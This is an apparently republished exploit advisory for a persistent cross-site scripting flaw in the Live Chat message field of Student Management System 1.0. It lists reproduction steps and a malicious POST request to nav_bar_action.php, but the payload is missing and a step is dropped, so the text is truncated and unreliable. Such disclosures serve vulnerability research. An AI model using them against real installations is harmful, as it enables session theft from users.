# Student Management System 1.0 – ‘message’ Persistent XSS漏洞
==XSS==
# Exploit Title: Student Management System 1.0 - 'message' Persistent Cross-Site Scripting (Authenticated) # Date: 2021-05-13 # Exploit Author: mohsen khashei (kh4sh3i) or kh4sh3i@gmail.com # Vendor Homepage: https://github.com/amirhamza05/Student-Management-System # Software Link: https://github.com/amirhamza05/Student-Management-System/archive/refs/heads/master.zip # Version: 1.0 # Tested on: ubuntu 20.04.2 # --- Description --- # # The web application allows for an Attacker to inject persistent Cross-Site-Scripting payload in Live Chat. # --- Proof of concept --- # 1- Login to Student Management System 2- Click on Live Chat button 3- Inject this payload and send :5- Xss popup will be triggered. # --- Malicious Request --- # POST /nav_bar_action.php HTTP/1.1 Host: (HOST) Cookie: (PHPSESSID) Content-Length: 96 send_message_chat%5Bmessage%5D=
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容